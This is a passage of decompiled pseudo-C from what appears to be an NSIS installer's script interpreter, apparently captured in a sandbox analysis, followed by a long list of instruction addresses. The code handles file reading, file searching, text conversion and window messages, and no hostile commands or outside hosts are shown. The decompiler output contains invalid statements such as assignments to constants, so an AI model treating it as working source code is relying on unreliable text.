                                                                            							__eax = E00403002(1);
                                                                            							_v712 = _v712 ^ 1;
                                                                            							 *0x40b908 = __ax;
                                                                            							__esi = (_v712 ^ 1) + 1;
                                                                            						}
                                                                            						__eflags =  *__edi - __bp;
                                                                            						if( *__edi == __bp) {
                                                                            							goto L392;
                                                                            						} else {
                                                                            							__edi = E00406C25(__edi);
                                                                            							_v716 = _v716 | _v656;
                                                                            							__eflags = _v716 | _v656;
                                                                            							if((_v716 | _v656) != 0) {
                                                                            								L301:
                                                                            								__eax = E00406A0B(__ecx, __edi, "C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll", __esi);
                                                                            								__eflags = __eax;
                                                                            								if(__eax != 0) {
                                                                            									goto L391;
                                                                            								}
                                                                            								goto L392;
                                                                            							}
                                                                            							__eflags = _v680.dwLowDateTime - __ebp;
                                                                            							if(_v680.dwLowDateTime == __ebp) {
                                                                            								goto L301;
                                                                            							}
                                                                            							__eax = E00406484(__edi, __edi);
                                                                            							__eflags = __eax;
                                                                            							if(__eax < 0) {
                                                                            								goto L392;
                                                                            							}
                                                                            							goto L301;
                                                                            						}
                                                                            					case 0x36:
                                                                            						_push(2);
                                                                            						_pop(__ecx);
                                                                            						_v712 = 0;
                                                                            						_v700 = __ecx;
                                                                            						__eax = E00403002(__ecx);
                                                                            						__ebx = 0;
                                                                            						__ebx = 1;
                                                                            						__eflags = __eax - 1;
                                                                            						if(__eax < 1) {
                                                                            							goto L391;
                                                                            						}
                                                                            						__ecx = 0x3ff;
                                                                            						__eflags = __eax - 0x3ff;
                                                                            						_v708 = __eax;
                                                                            						__eflags =  *__edi - __bp;
                                                                            						if( *__edi == __bp) {
                                                                            							L327:
                                                                            							__eax = _v712;
                                                                            							__ecx = 0;
                                                                            							__ebx = 0;
                                                                            							__eflags = __eax;
                                                                            							 *(__esi + __eax * 2) = __cx;
                                                                            							L80:
                                                                            							__ebx = __ebx & 0xffffff00 | __eflags == 0x00000000;
                                                                            							goto L392;
                                                                            						}
                                                                            						_v668 = 0;
                                                                            						0 = E00406C25(__edi);
                                                                            						_v708 = __ecx;
                                                                            						__eflags = _v712;
                                                                            						if(_v712 <= 0) {
                                                                            							goto L327;
                                                                            						}
                                                                            						_v664 = 0xd;
                                                                            						__edi = 0;
                                                                            						do {
                                                                            							__eflags = _v696 - 0x39;
                                                                            							if(_v696 != 0x39) {
                                                                            								__eflags = _v680.dwLowDateTime - __ebp;
                                                                            								if(_v680.dwLowDateTime != __ebp) {
                                                                            									L320:
                                                                            									__eax =  &_v660;
                                                                            									__eax = E00406948(__ecx, __ecx,  &_v660, 2);
                                                                            									__eflags = __eax;
                                                                            									if(__eax == 0) {
                                                                            										goto L327;
                                                                            									}
                                                                            									L321:
                                                                            									__ecx = _v700;
                                                                            									__eax = _v660;
                                                                            									L322:
                                                                            									__eflags = _v680.dwLowDateTime - __ebp;
                                                                            									if(_v680.dwLowDateTime != __ebp) {
                                                                            										L333:
                                                                            										__ax & 0x0000ffff = E0040661F(__esi, __ax & 0x0000ffff);
                                                                            										goto L393;
                                                                            									}
                                                                            									_push(0xd);
                                                                            									_pop(__edx);
                                                                            									__eflags = _v668 - __dx;
                                                                            									_push(0xa);
                                                                            									_pop(__edx);
                                                                            									if(_v668 == __dx) {
                                                                            										L328:
                                                                            										__eflags = _v668 - __ax;
                                                                            										if(_v668 == __ax) {
                                                                            											L332:
                                                                            											__eax = SetFilePointer(_v704, 0, __ebp, 0);
                                                                            											goto L327;
                                                                            										}
                                                                            										__eflags = __ax - _v664;
                                                                            										if(__ax == _v664) {
                                                                            											L331:
                                                                            											 *(__esi + __edi * 2) = __ax;
                                                                            											_v712 = __edi;
                                                                            											goto L327;
                                                                            										}
                                                                            										__eflags = __ax - __dx;
                                                                            										if(__ax != __dx) {
                                                                            											goto L332;
                                                                            										}
                                                                            										goto L331;
                                                                            									}
                                                                            									__eflags = _v668 - __dx;
                                                                            									if(_v668 == __dx) {
                                                                            										goto L328;
                                                                            									}
                                                                            									 *(__esi + __edi * 2) = __ax;
                                                                            									__edi = __edi + 1;
                                                                            									__eax = __ax & 0x0000ffff;
                                                                            									_v712 = __edi;
                                                                            									_v668 = __ax & 0x0000ffff;
                                                                            									__eflags = __ax;
                                                                            									if(__ax == 0) {
                                                                            										goto L327;
                                                                            									}
                                                                            									goto L326;
                                                                            								}
                                                                            								__eflags = __edi;
                                                                            								if(__edi != 0) {
                                                                            									goto L320;
                                                                            								}
                                                                            								__eax = E00406484(__ecx, __ebp);
                                                                            								__eflags = __eax;
                                                                            								if(__eax < 0) {
                                                                            									goto L327;
                                                                            								}
                                                                            								__ecx = _v704;
                                                                            								goto L320;
                                                                            							}
                                                                            							_push(__ebp);
                                                                            							__eax =  &_v656;
                                                                            							_push( &_v656);
                                                                            							_push(2);
                                                                            							_pop(__eax);
                                                                            							 &_v656 - _v680.dwLowDateTime =  &_v716;
                                                                            							__eax = ReadFile(__ecx,  &_v716,  &_v656 - _v680.dwLowDateTime, ??, ??);
                                                                            							__eflags = __eax;
                                                                            							if(__eax == 0) {
                                                                            								goto L327;
                                                                            							}
                                                                            							__ecx = _v656;
                                                                            							_v700 = __ecx;
                                                                            							__eflags = __ecx;
                                                                            							if(__ecx == 0) {
                                                                            								goto L327;
                                                                            							}
                                                                            							__eax = _v716 & 0x000000ff;
                                                                            							_v660 = _v716 & 0x000000ff;
                                                                            							__eflags = _v680.dwLowDateTime - __ebp;
                                                                            							if(_v680.dwLowDateTime != __ebp) {
                                                                            								goto L333;
                                                                            							}
                                                                            							 &_v660 =  &_v716;
                                                                            							__eax = MultiByteToWideChar(__ebp, 8,  &_v716, __ecx,  &_v660, __ebx);
                                                                            							__eflags = __eax;
                                                                            							if(__eax != 0) {
                                                                            								goto L321;
                                                                            							}
                                                                            							__ecx = _v700;
                                                                            							__edx = __ecx;
                                                                            							__edx =  ~__ecx;
                                                                            							while(1) {
                                                                            								_t351 =  &_v656;
                                                                            								 *_t351 = _v656 - 1;
                                                                            								__eflags =  *_t351;
                                                                            								__eax = 0xfffd;
                                                                            								_v660 = 0xfffd;
                                                                            								if( *_t351 == 0) {
                                                                            									goto L322;
                                                                            								}
                                                                            								__ecx = __ecx - 1;
                                                                            								__edx =  &(__edx->i);
                                                                            								_v700 = __ecx;
                                                                            								_v652 = __edx;
                                                                            								SetFilePointer(_v704, __edx, __ebp, __ebx) =  &_v660;
                                                                            								__eax =  &_v716;
                                                                            								__eax = MultiByteToWideChar(__ebp, 8,  &_v716, _v656,  &_v660, __ebx);
                                                                            								__ecx = _v700;
                                                                            								__edx = _v652;
                                                                            								__eflags = __eax;
                                                                            								if(__eax == 0) {
                                                                            									continue;
                                                                            								}
                                                                            								goto L321;
                                                                            							}
                                                                            							goto L322;
                                                                            							L326:
                                                                            							__ecx = _v704;
                                                                            							__eflags = __edi - _v708;
                                                                            						} while (__edi < _v708);
                                                                            						goto L327;
                                                                            					case 0x37:
                                                                            						__eflags =  *__edi - __bp;
                                                                            						asm("das");
                                                                            						if(__eflags == 0) {
                                                                            							goto L391;
                                                                            						} else {
                                                                            							__eax = E00403002(2);
                                                                            							__eax = E00406C25(__edi);
                                                                            							__eax = SetFilePointer(__eax, __eax, 0, _v680.dwLowDateTime);
                                                                            							__eflags = _v692;
                                                                            							if(_v692 < 0) {
                                                                            								goto L391;
                                                                            							}
                                                                            							goto L337;
                                                                            						}
                                                                            					case 0x38:
                                                                            						__eax = E00406C25(__edi);
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							__eax = FindClose(__eax);
                                                                            						}
                                                                            						goto L391;
                                                                            					case 0x39:
                                                                            						__eax = E00406C25(__esi);
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							L61:
                                                                            							0 = 1;
                                                                            							__eax = 0;
                                                                            							 *__edi = __ax;
                                                                            							goto L392;
                                                                            						}
                                                                            						__ecx =  &(_v596.ftCreationTime);
                                                                            						__eax = FindNextFileW(__eax,  &(_v596.ftCreationTime));
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							goto L61;
                                                                            						}
                                                                            						goto L342;
                                                                            					case 0x3a:
                                                                            						__eax = E0040303E(__edx, 2);
                                                                            						__ecx =  &_v596;
                                                                            						__eax = FindFirstFileW(__eax,  &_v596);
                                                                            						__eflags = __eax - 0xffffffff;
                                                                            						if(__eax != 0xffffffff) {
                                                                            							__eax = E0040661F(__esi, __eax);
                                                                            							L342:
                                                                            							__eax =  &_v548;
                                                                            							_push( &_v548);
                                                                            							_push(__edi);
                                                                            							goto L157;
                                                                            						}
                                                                            						__eax = 0;
                                                                            						 *__esi = __ax;
                                                                            						L291:
                                                                            						__eax = 0;
                                                                            						 *__edi = __ax;
                                                                            						goto L28;
                                                                            					case 0x3b:
                                                                            						_v708 = 0xfffffd66;
                                                                            						0 = E0040303E(__edx, 0xfffffff0);
                                                                            						_v656 = __ebx;
                                                                            						__eax = E00406E03(__ebx);
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							__eax = E0040303E(__edx, 0xffffffed);
                                                                            						}
                                                                            						__eax = E00406B9D(__ebx);
                                                                            						__edi = E0040691B(__ebx, 0x40000000, 2);
                                                                            						_v720 = __edi;
                                                                            						__eflags = __edi - 0xffffffff;
                                                                            						if(__edi == 0xffffffff) {
                                                                            							L360:
                                                                            							_push(0xfffffff3);
                                                                            							_pop(__esi);
                                                                            							__eflags = _v708 - __ebp;
                                                                            							if(_v708 >= __ebp) {
                                                                            								__ebx = _v716;
                                                                            							} else {
                                                                            								_push(0xffffffef);
                                                                            								_pop(__esi);
                                                                            								__eax = DeleteFileW(__ebx);
                                                                            								0 = 1;
                                                                            							}
                                                                            							_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            							_push(__esi);
                                                                            							L230:
                                                                            							__eax = E00405D3A();
                                                                            							goto L392;
                                                                            						} else {
                                                                            							__eax = _v688;
                                                                            							_v664 = _v688;
                                                                            							__eflags = _v684 - __ebp;
                                                                            							if(_v684 == __ebp) {
                                                                            								L359:
                                                                            								_v724 = __eax;
                                                                            								__eax = CloseHandle(__edi);
                                                                            								goto L360;
                                                                            							}
                                                                            							__eax =  *0x435a08;
                                                                            							_v712 = __eax;
                                                                            							__esi = __eax;
                                                                            							_v708 = __esi;
                                                                            							__eflags = __esi;
                                                                            							if(__esi == 0) {
                                                                            								__eax = _v664;
                                                                            								goto L359;
                                                                            							}
                                                                            							E00403131(__ebp) = E0040311B(__esi, _v716);
                                                                            							__edi = GlobalAlloc(0x40, _v696);
                                                                            							_v680.dwHighDateTime = __edi;
                                                                            							__eflags = __edi;
                                                                            							if(__edi == 0) {
                                                                            								L357:
                                                                            								__edi = _v704;
                                                                            								__eax = E00406A0B(__ecx, __edi, __esi, _v712);
                                                                            								GlobalFree(__esi) = __eax | 0xffffffff;
                                                                            								goto L359;
                                                                            							}
                                                                            							__eax = E00403148(_v688, __ebp, __edi, _v684);
                                                                            							__eflags =  *__edi;
                                                                            							if( *__edi == 0) {
                                                                            								L356:
                                                                            								__eax = GlobalFree(_v664);
                                                                            								goto L357;
                                                                            							}
                                                                            							__ebx = __esi;
                                                                            							do {
                                                                            								__esi =  *__edi;
                                                                            								__eax =  *(__edi + 4);
                                                                            								__edi = __edi + 8;
                                                                            								__eax = E004066B4(__eax, __edi, __esi);
                                                                            								__edi = __edi + __esi;
                                                                            								__eflags =  *__edi;
                                                                            							} while ( *__edi != 0);
                                                                            							__ebx = _v652;
                                                                            							__esi = _v708;
                                                                            							goto L356;
                                                                            						}
                                                                            					case 0x3c:
                                                                            						__eax = E00403002(0);
                                                                            						__ebx = __eax;
                                                                            						__eflags = __ebx -  *0x435a2c;
                                                                            						if(__ebx >=  *0x435a2c) {
                                                                            							goto L28;
                                                                            						}
                                                                            						__ecx = _v684;
                                                                            						__edi = __ebx * 0x818;
                                                                            						__edi = __ebx * 0x818 +  *0x435a28;
                                                                            						__eflags = __ecx;
                                                                            						if(__eflags < 0) {
                                                                            							__eax = __eax | 0xffffffff;
                                                                            							__eax = __eax - __ecx;
                                                                            							__eflags = __eax;
                                                                            							_v684 = __eax;
                                                                            							if(__eax == 0) {
                                                                            								_push(_v680.dwHighDateTime);
                                                                            								__eax = __edi + 0x18;
                                                                            								_push(__edi + 0x18);
                                                                            								__eax = E00405EBA();
                                                                            								_t421 = __edi + 8;
                                                                            								 *_t421 =  *(__edi + 8) | 0x00000100;
                                                                            								__eflags =  *_t421;
                                                                            								__ecx = _v696;
                                                                            							} else {
                                                                            								0 = E00403002(1);
                                                                            								_v688 = __ecx;
                                                                            							}
                                                                            							__eax = _v692;
                                                                            							 *(__edi + _v692 * 4) = __ecx;
                                                                            							__eflags = _v688 - __ebp;
                                                                            							if(_v688 != __ebp) {
                                                                            								__eax = E00401221(__ebx);
                                                                            							}
                                                                            							goto L391;
                                                                            						}
                                                                            						__eax =  *(__edi + __ecx * 4);
                                                                            						if(__eflags != 0) {
                                                                            							goto L337;
                                                                            						}
                                                                            						__eax = __edi + 0x18;
                                                                            						_push(__edi + 0x18);
                                                                            						_push(__esi);
                                                                            						L157:
                                                                            						__eax = E00406B1A();
                                                                            						goto L391;
                                                                            					case 0x3d:
                                                                            						__edx = E00403002(0);
                                                                            						__eflags = __edx - 0x20;
                                                                            						if(__edx >= 0x20) {
                                                                            							L28:
                                                                            							0 = 1;
                                                                            							goto L392;
                                                                            						}
                                                                            						__eflags = _v680.dwLowDateTime;
                                                                            						if(_v680.dwLowDateTime == 0) {
                                                                            							__eax =  *0x435a10;
                                                                            							__eflags = _v684;
                                                                            							if(_v684 == 0) {
                                                                            								_push( *((intOrPtr*)(__eax + 0x94 + __edx * 4)));
                                                                            								_push(__esi);
                                                                            								__eax = E00405EBA();
                                                                            							} else {
                                                                            								__ecx = _v688;
                                                                            								 *((intOrPtr*)(__eax + 0x94 + __edx * 4)) = _v688;
                                                                            							}
                                                                            							goto L391;
                                                                            						}
                                                                            						__eflags = _v684;
                                                                            						if(_v684 == 0) {
                                                                            							__eax = E004011A0(0);
                                                                            							L337:
                                                                            							_push(__eax);
                                                                            							_push(__esi);
                                                                            							goto L21;
                                                                            						}
                                                                            						E00401290(__edx) = E004012DD(0, 0);
                                                                            						goto L391;
                                                                            					case 0x3e:
                                                                            						__eax = _v680.dwLowDateTime;
                                                                            						__eax = _v680.dwLowDateTime;
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							__edi = E004068E6(5);
                                                                            							__eax = E0040303E(__edx, 0x22);
                                                                            							__eflags = __edi;
                                                                            							if(__edi == 0) {
                                                                            								L388:
                                                                            								0 = 1;
                                                                            								__eax = 0;
                                                                            								 *__esi = __ax;
                                                                            								goto L392;
                                                                            							}
                                                                            							__ecx =  &_v652;
                                                                            							_push( &_v652);
                                                                            							_push(__eax);
                                                                            							__imp__IIDFromString();
                                                                            							__eflags = __eax;
                                                                            							if(__eax < 0) {
                                                                            								goto L388;
                                                                            							}
                                                                            							__eax =  &_v716;
                                                                            							_push( &_v716);
                                                                            							_push(0);
                                                                            							_push(_v688);
                                                                            							__eax =  &_v660;
                                                                            							_push( &_v660);
                                                                            							__eax =  *__edi();
                                                                            							__eflags = __eax;
                                                                            							if(__eax < 0) {
                                                                            								goto L388;
                                                                            							}
                                                                            							__eax = E00406B1A(__esi, _v732);
                                                                            							_push(_v740);
                                                                            							__imp__CoTaskMemFree();
                                                                            							goto L391;
                                                                            						}
                                                                            						__eax = __eax - 1;
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							goto L391;
                                                                            						}
                                                                            						__esi = E00403002(2);
                                                                            						__eax = E00403002(4);
                                                                            						__edx = __al & 0x000000ff;
                                                                            						__eax = __eax >> 0x18;
                                                                            						__ecx = 0x435ac0;
                                                                            						__eflags = __esi;
                                                                            						_v708 = 0;
                                                                            						__ecx =  !=  ? __esi : 0x435ac0;
                                                                            						 &_v708 = E004066B4( &_v708,  &_v708, __al & 0x000000ff);
                                                                            						_push(_v720);
                                                                            						_push(_v724);
                                                                            						L21:
                                                                            						__eax = E0040661F();
                                                                            						goto L391;
                                                                            					case 0x3f:
                                                                            						goto L391;
                                                                            					case 0x40:
                                                                            						__eax =  *0x42bd40; // 0x1
                                                                            						__eax = SendMessageW(__edx, 0xb, __eax, 0);
                                                                            						__eflags = _v692;
                                                                            						if(_v692 != 0) {
                                                                            							_v700 = InvalidateRect(_v700, 0, 0);
                                                                            						}
                                                                            						goto L391;
                                                                            				}
                                                                            			}

















































                                                                            0x00401565
                                                                            0x0040156a
                                                                            0x0040156e
                                                                            0x00401570
                                                                            0x00401574
                                                                            0x00401579
                                                                            0x0040158b
                                                                            0x00401593
                                                                            0x00401597
                                                                            0x004015a3
                                                                            0x004015a6
                                                                            0x004015aa
                                                                            0x004015b5
                                                                            0x004015b9
                                                                            0x004015bd
                                                                            0x00402ea1
                                                                            0x00402ea1
                                                                            0x00402ea5
                                                                            0x00402ea5
                                                                            0x00402eab
                                                                            0x00000000
                                                                            0x00402eab
                                                                            0x004015c7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004015d5
                                                                            0x004015d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004015e6
                                                                            0x004015ec
                                                                            0x004015ee
                                                                            0x004015f1
                                                                            0x004015f1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004015ff
                                                                            0x00401600
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040160c
                                                                            0x0040160d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401619
                                                                            0x00401621
                                                                            0x00401622
                                                                            0x00401624
                                                                            0x00401628
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401634
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004016c1
                                                                            0x004016c7
                                                                            0x004016cd
                                                                            0x004016cf
                                                                            0x004016d3
                                                                            0x004016d5
                                                                            0x004016d5
                                                                            0x004016d9
                                                                            0x004016de
                                                                            0x004016e0
                                                                            0x004016e8
                                                                            0x004016e8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004016f1
                                                                            0x004016fb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401718
                                                                            0x0040171b
                                                                            0x00401720
                                                                            0x00401724
                                                                            0x00401726
                                                                            0x00401728
                                                                            0x00401784
                                                                            0x00401784
                                                                            0x00401789
                                                                            0x0040178e
                                                                            0x004017bb
                                                                            0x00000000
                                                                            0x00401790
                                                                            0x00401790
                                                                            0x0040179d
                                                                            0x004017a3
                                                                            0x004017a9
                                                                            0x004017ab
                                                                            0x004017b2
                                                                            0x004017b2
                                                                            0x00000000
                                                                            0x004017ab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401741
                                                                            0x00401741
                                                                            0x00401745
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401747
                                                                            0x0040174c
                                                                            0x0040174e
                                                                            0x00401751
                                                                            0x0040175e
                                                                            0x0040175e
                                                                            0x00401760
                                                                            0x00401775
                                                                            0x00401775
                                                                            0x00401778
                                                                            0x0040177b
                                                                            0x0040177e
                                                                            0x0040172a
                                                                            0x00401732
                                                                            0x00401734
                                                                            0x00401736
                                                                            0x00401739
                                                                            0x0040173c
                                                                            0x0040173f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401780
                                                                            0x00401780
                                                                            0x00000000
                                                                            0x00401780
                                                                            0x0040177e
                                                                            0x00401762
                                                                            0x00401767
                                                                            0x00401774
                                                                            0x00401774
                                                                            0x00401774
                                                                            0x00000000
                                                                            0x00401774
                                                                            0x0040176a
                                                                            0x00401770
                                                                            0x00401772
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401772
                                                                            0x00401758
                                                                            0x00401759
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004017c3
                                                                            0x004017c9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040163f
                                                                            0x00401643
                                                                            0x00401645
                                                                            0x00401671
                                                                            0x00401678
                                                                            0x00401647
                                                                            0x00401647
                                                                            0x00401649
                                                                            0x00401650
                                                                            0x00401650
                                                                            0x0040165f
                                                                            0x00401661
                                                                            0x00401665
                                                                            0x00401665
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401684
                                                                            0x00401688
                                                                            0x0040168a
                                                                            0x00401693
                                                                            0x00401697
                                                                            0x0040169e
                                                                            0x004016a0
                                                                            0x004016a2
                                                                            0x004016a6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004016af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004017dc
                                                                            0x004017e5
                                                                            0x004017e7
                                                                            0x004017ee
                                                                            0x004017f4
                                                                            0x004017f6
                                                                            0x00401804
                                                                            0x00401808
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040180f
                                                                            0x00401814
                                                                            0x00401816
                                                                            0x00000000
                                                                            0x0040181c
                                                                            0x0040181e
                                                                            0x00401823
                                                                            0x00401828
                                                                            0x00000000
                                                                            0x00401828
                                                                            0x004017f8
                                                                            0x004017f8
                                                                            0x004017fd
                                                                            0x0040160e
                                                                            0x0040160e
                                                                            0x00000000
                                                                            0x0040160e
                                                                            0x00000000
                                                                            0x00401835
                                                                            0x00401837
                                                                            0x00401843
                                                                            0x00401849
                                                                            0x0040184b
                                                                            0x00401857
                                                                            0x0040185b
                                                                            0x0040185d
                                                                            0x0040187b
                                                                            0x0040187b
                                                                            0x0040187f
                                                                            0x0040187f
                                                                            0x00401883
                                                                            0x00401890
                                                                            0x00401890
                                                                            0x00000000
                                                                            0x00401883
                                                                            0x0040185f
                                                                            0x00401862
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401865
                                                                            0x0040186a
                                                                            0x0040186c
                                                                            0x00000000
                                                                            0x0040186e
                                                                            0x0040186e
                                                                            0x00401876
                                                                            0x00000000
                                                                            0x00401876
                                                                            0x0040186c
                                                                            0x0040184d
                                                                            0x0040184f
                                                                            0x00401850
                                                                            0x00401852
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040189d
                                                                            0x004018a2
                                                                            0x004018b0
                                                                            0x004018b6
                                                                            0x004018b8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004018cd
                                                                            0x004018d4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004018e0
                                                                            0x004018e5
                                                                            0x004018e9
                                                                            0x004018eb
                                                                            0x004018ee
                                                                            0x004018f3
                                                                            0x004018f7
                                                                            0x004018fc
                                                                            0x00401901
                                                                            0x00401902
                                                                            0x00401904
                                                                            0x00401914
                                                                            0x00401920
                                                                            0x00401906
                                                                            0x00401906
                                                                            0x00401907
                                                                            0x00401907
                                                                            0x00401926
                                                                            0x0040192b
                                                                            0x0040192d
                                                                            0x0040192d
                                                                            0x0040192e
                                                                            0x0040192e
                                                                            0x00401931
                                                                            0x00401964
                                                                            0x00401964
                                                                            0x00401966
                                                                            0x00401969
                                                                            0x00401969
                                                                            0x0040196e
                                                                            0x00401970
                                                                            0x00401975
                                                                            0x0040197d
                                                                            0x00401982
                                                                            0x00401986
                                                                            0x00401989
                                                                            0x00401a18
                                                                            0x00401a1f
                                                                            0x00401a24
                                                                            0x00401a28
                                                                            0x00401a35
                                                                            0x00401a3a
                                                                            0x00401a40
                                                                            0x00401a45
                                                                            0x00401a49
                                                                            0x00401a52
                                                                            0x00401a5a
                                                                            0x00401a60
                                                                            0x00401a61
                                                                            0x00401a67
                                                                            0x00401a6b
                                                                            0x00401a6d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401a73
                                                                            0x00401a76
                                                                            0x00401a89
                                                                            0x00401a8b
                                                                            0x00401a8c
                                                                            0x00401a78
                                                                            0x00401a78
                                                                            0x00401a7a
                                                                            0x00401a82
                                                                            0x00401a82
                                                                            0x00401a91
                                                                            0x00401a96
                                                                            0x00000000
                                                                            0x00401a96
                                                                            0x00401a4b
                                                                            0x00401a50
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040198f
                                                                            0x0040198f
                                                                            0x00401991
                                                                            0x004019fd
                                                                            0x00401a04
                                                                            0x00401a09
                                                                            0x00401a0b
                                                                            0x00000000
                                                                            0x00401a0b
                                                                            0x00000000
                                                                            0x00401991
                                                                            0x00401989
                                                                            0x00401934
                                                                            0x00401939
                                                                            0x0040193b
                                                                            0x0040193d
                                                                            0x0040193f
                                                                            0x00401943
                                                                            0x00401943
                                                                            0x0040194e
                                                                            0x0040194e
                                                                            0x00401950
                                                                            0x00401953
                                                                            0x00401959
                                                                            0x0040195b
                                                                            0x0040195d
                                                                            0x0040195f
                                                                            0x0040195f
                                                                            0x00401960
                                                                            0x00000000
                                                                            0x00401993
                                                                            0x004019a8
                                                                            0x004019ad
                                                                            0x004019b1
                                                                            0x004019c5
                                                                            0x004019ce
                                                                            0x004019d7
                                                                            0x004019dc
                                                                            0x004019dc
                                                                            0x004019dc
                                                                            0x004019e5
                                                                            0x004019e5
                                                                            0x004019e8
                                                                            0x004019f2
                                                                            0x00000000
                                                                            0x004019f2
                                                                            0x004019ea
                                                                            0x004019eb
                                                                            0x004015d7
                                                                            0x004015d7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401aa1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401ab8
                                                                            0x00401ac2
                                                                            0x00401ac7
                                                                            0x00401ac9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401acf
                                                                            0x00401ad3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401ad9
                                                                            0x00401add
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401ae3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401aec
                                                                            0x00401aa2
                                                                            0x00401aac
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401af2
                                                                            0x00401af8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401b0c
                                                                            0x00401b0e
                                                                            0x00401b19
                                                                            0x00401b1b
                                                                            0x00401b21
                                                                            0x00401b25
                                                                            0x00401b2a
                                                                            0x00401b2c
                                                                            0x00401b2e
                                                                            0x00401b31
                                                                            0x00401b34
                                                                            0x00401b36
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401b3c
                                                                            0x00401b3e
                                                                            0x00401b48
                                                                            0x00401b48
                                                                            0x00401b4a
                                                                            0x00401b51
                                                                            0x00401b56
                                                                            0x00401b5b
                                                                            0x00401b5d
                                                                            0x00401b65
                                                                            0x00401b65
                                                                            0x00401b65
                                                                            0x00401b67
                                                                            0x00401b69
                                                                            0x00401b6b
                                                                            0x00401b6e
                                                                            0x00401b72
                                                                            0x00401b77
                                                                            0x00401b7d
                                                                            0x00401b7f
                                                                            0x00401b7f
                                                                            0x00000000
                                                                            0x00401b77
                                                                            0x00401b40
                                                                            0x00401b40
                                                                            0x00401b42
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401b91
                                                                            0x00401b98
                                                                            0x00401b99
                                                                            0x00401b9a
                                                                            0x00401b9e
                                                                            0x00401ba8
                                                                            0x00401ba0
                                                                            0x00401ba0
                                                                            0x00401ba0
                                                                            0x00401bae
                                                                            0x00401bb0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401bbb
                                                                            0x00401bbd
                                                                            0x00401bc9
                                                                            0x00401bcd
                                                                            0x00401bd3
                                                                            0x00401bd5
                                                                            0x00401be9
                                                                            0x00401be9
                                                                            0x00401beb
                                                                            0x00401bed
                                                                            0x00401bf6
                                                                            0x00401bf6
                                                                            0x00401bf8
                                                                            0x00000000
                                                                            0x00401bf8
                                                                            0x00401bd7
                                                                            0x00401bdb
                                                                            0x00401bf2
                                                                            0x00401bf2
                                                                            0x00000000
                                                                            0x00401bf2
                                                                            0x00401bdf
                                                                            0x00401be5
                                                                            0x00401be7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c04
                                                                            0x00401c10
                                                                            0x00401c12
                                                                            0x00401c19
                                                                            0x00401c1b
                                                                            0x00401c25
                                                                            0x00401c27
                                                                            0x00401c32
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c38
                                                                            0x00401c38
                                                                            0x00000000
                                                                            0x00401c38
                                                                            0x00401c29
                                                                            0x00401c29
                                                                            0x00000000
                                                                            0x00401c29
                                                                            0x00401c1d
                                                                            0x00401c1f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c21
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c41
                                                                            0x00401c43
                                                                            0x00401c4c
                                                                            0x00401c55
                                                                            0x00401c57
                                                                            0x00401c5b
                                                                            0x00401c5e
                                                                            0x00401cd0
                                                                            0x00401cd0
                                                                            0x00401cd4
                                                                            0x00401cd6
                                                                            0x00000000
                                                                            0x00401cd6
                                                                            0x00401c60
                                                                            0x00000000
                                                                            0x00401c67
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c6b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c6f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c74
                                                                            0x00401c76
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c78
                                                                            0x00401c7a
                                                                            0x00401c7b
                                                                            0x00401c7b
                                                                            0x00401c7b
                                                                            0x00401c7d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401c8c
                                                                            0x00000000
